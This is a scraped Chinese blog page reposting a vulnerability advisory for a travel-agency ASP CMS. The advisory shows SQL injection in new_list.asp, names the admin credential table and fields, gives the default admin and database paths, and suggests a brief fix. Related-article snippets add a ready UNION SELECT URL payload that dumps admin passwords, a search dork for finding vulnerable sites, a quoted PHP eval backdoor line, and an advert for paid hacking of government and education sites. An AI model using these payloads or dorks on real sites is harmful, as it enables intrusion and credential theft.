仙游旅行社管理系统v1.0漏洞及修复 - 漏洞发布 京华志

最新推荐文章于 2024-08-09 21:25:57 发布
最新推荐文章于 2024-08-09 21:25:57 发布
阅读量1.2k 收藏
点赞数
分类专栏: 漏洞发布_通用漏洞 文章标签: 数据库
 Author:mer4en7y
Blog:www.hi.baidu.com/alonecode
1)注入漏洞:
漏洞文件:new_list.asp:
bid = trim(request("bid"))
sid = trim(request("sid"))

if bid<>"" then
bwhere = " and bigid="& bid &""
else
bwhere = ""
end if
if sid<>"" then
swhere = " and smallid="& sid &""
else
swhere = ""
end if
idsql="select * from lxscms_n where shenhe=1"& bwhere & swhere &" order by id desc"
表名:lxscms_u字段:qwbmuname,qwbmupwds
默认后台:/admin

2)数据库默认地址:
/admin/#a&_as12=b.as.mdb

修复:new_list.asp页面过滤参数输入。修改默认数据库地址,做防下载处理



www.jinghuazhi.com

 

 

 

 

 

 

 

 

qq9361235
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
某款asp的cms程序注射漏洞
一生无悔惜缘的博客
08-04 1635
简要描述: 谷歌百度搜索关键词 inurl:HomeMarket.asp 在域名后面加上以下代码能爆破出管理帐号密码/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%2
南方数据企业0day
qq_48806485的博客
06-24 226
南方数据企业0day 漏洞影响版本 v10.0 v11.0 关键字:inurl:”HomeMarket.asp” 默认后台:/admin 直接爆用户密码: http://www.xxx.com/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%2
仙游旅行社管理系统免费版
11-10
对于一般旅行社、旅游公司、旅游票务、从事旅游.行业的个人或公司、酒店、旅馆、景区或其他等类似行业相关旅游.行业从业人员来说,使用简单,容易上手,不需专业的管理人员,即可轻轻松松建立出满意的旅行社(旅游)网站
拿站完整过程
11-15
一个完整的拿站过程,目标网站-后台地址-后面账户密码-无漏洞- 寻旁注
批量扫描域名拿shell到提权服务器.rar
10-21
批量扫描域名拿shell到提权服务器 小白入门用
DedeCMS 5.7 后门漏洞
weixin_33895475的博客
03-21 589
简要描述: DedeCMS V5.7 SP1正式版UTF-8 GBK版本疑似被植入一句话后门前几日下载并不存在此代码 详细说明: shopcar.class.php被植入一句话@eval(file_get_contents('php://input')); 漏洞证明: shopcar.class.php被植入一句话@eval(file_get_contents('php://input'...
Flash 0day漏洞(CVE-2018-5002)千万不要乱打开Excel文档!
网站安全专家
06-09 1373
腾讯御见威胁情报中心近日监控到一例使用Adobe Flash 0day漏洞(CVE-2018-5002)的APT攻击,攻击者疑通过即时聊天工具和邮箱等把恶意Excel文档发送给目标人员,诱骗目标人员打开文档。实际上,该恶意Excel文档经过特别构造,被嵌入了flash对象,用户一旦打开文档电脑就会中毒。CVE-2018-5002影响Adobe Flash Player 29.0.0.171及所有之...
Web应急:网站被批量挂黑页
06-10 486
作为一个网站管理员,你采用开源CMS做网站,比如dedecms,但是有一天,你忽然发现不知何时,网站的友情链接模块被挂大量垃圾链接,网站出现了很多不该有的目录,里面全是博彩相关的网页。而且,攻击者在挂黑页以后,会在一些小论坛注册马甲将你的网站黑页链接发到论坛,引爬虫收录。在搜索引擎搜索网站地址时,收录了一些会出现一些博彩页面,严重影响了网站形象。 原因分析 网站存在高危漏洞,常见于一...
千博企业网站管理系统HitCount.Asp页面注入漏洞
fengling132的专栏
05-02 1269
程序都加入了防注入代码的,在NoSql.asp文件中7kccopyd-code If EnableStopInjection = True Then Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr Fy_In = "’|;|and|exec|insert|select|delete|update|c
08CMS小说搜索型注入 - 漏洞发布 京华
浓缩精华 方成志 京华志
10-04 1074
Vul Code: //搜索词预处理 $searchword = empty($searchword) ? '' : cutstr(trim($searchword),50,''); $_da['searchword'] = $searchword; if($search
米斯特白帽培训讲义 实战篇 南方 0day
热门推荐
龙哥盟
12-26 3万+
米斯特白帽培训讲义 实战篇 南方 0day 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 搜索关键词:inurl:"HomeMarket.asp"。下载与部署http://www.jb51.net/article/5336.htmSQL 注入我们打算检测其中的 SQL 注入漏洞,由于 ASP 代码基本没有什么好的过滤,一般一查一个准。为了搜索 SQ
寻找Hacker拿站大神
u012105297的专栏
09-13 860
寻找Hacker拿站大神,收所有人事网数据,联系QQ:2731078535,获取数据库资料即可。 入侵目标:教育考试网站,学信网,财政厅,人事网,各种高难度站,每单至少1万以上,一年保证50万活,希望能寻求长期合作大牛,骗子请绕道,(有技术实力单线联系)此贴长期有效 如果不愿意腾讯号联系 可发送邮件告知我你的联系方式  邮箱qjwqvc24@163.com  有实力价格可谈 绝不亏待,有人介绍
SQL注入之南方0day
克格莫
04-18 2821
关键词:     inurl:"HomeMarket.asp"第一个杭州开泰实际上已经不能愉快的玩耍了,于是很幸运的找到一个可以拿来玩耍的,具体不上图。当然,登进去后看了看后台的ip记录,也已经被光顾了无数次,都快被玩烂了剩下的一些要么装了安全狗,要么就是创宇的防火墙。另外测了一下杭州开泰那个网站的“联系我们”的XSS,依然存在。效果如图:接下来记录一下另一个站的注入:首先,在首页后加NewsTy...
Kali Linux渗透测试 071 HTTrack 爬取整站
kevinhanser
03-05 5150
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 httrack 爬取整站
用struts2 s2-045漏洞拿站记录
幻的博客
03-11 5956
浏览FreeBuf时发现的文章,新出的漏洞: http://www.freebuf.com/vuls/128668.html 漏洞一出,各位大神早就写出POC: http://www.reg008.com/forum/forum.php?mod=viewthread&tid=9&extra= 接下来就是寻找有漏洞的网站了,这是个麻烦事。 不过有个网站可以拿来干这事: h
JDBC详细使用
最新发布
m0_73627305的博客
08-09 453
​ JDBC是一种标准,一种规则,主要作用是使用java语言操作数据库的​ JDBC这个标准中有很多的接口,接口中有很多方法。
seatunnel2.3.3在centos7上安装
鑫哥
08-09 812
安装前需要准备点环境,因为seatunnel是基于java开发的,因此需要先安装java,我这里使用的java1.8,可以网上搜索下java安装教程,记得配置JAVA_HOME环境变量。在安装的过程中需要用到mysql命令,因此也需要安装下MySQL环境,这里也不具体讲解了,在网上搜索安装就行。接下来就是正式安装seatunnel了,
SpringBoot依赖之Quartz Scheduler定时调度器使用MySQL存储Job
ahauedu的专栏
08-07 556
接上一篇。本篇将在 Spring Boot 项目中,使用 Quartz Scheduler 结合 MySQL 数据库来存储 Job。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值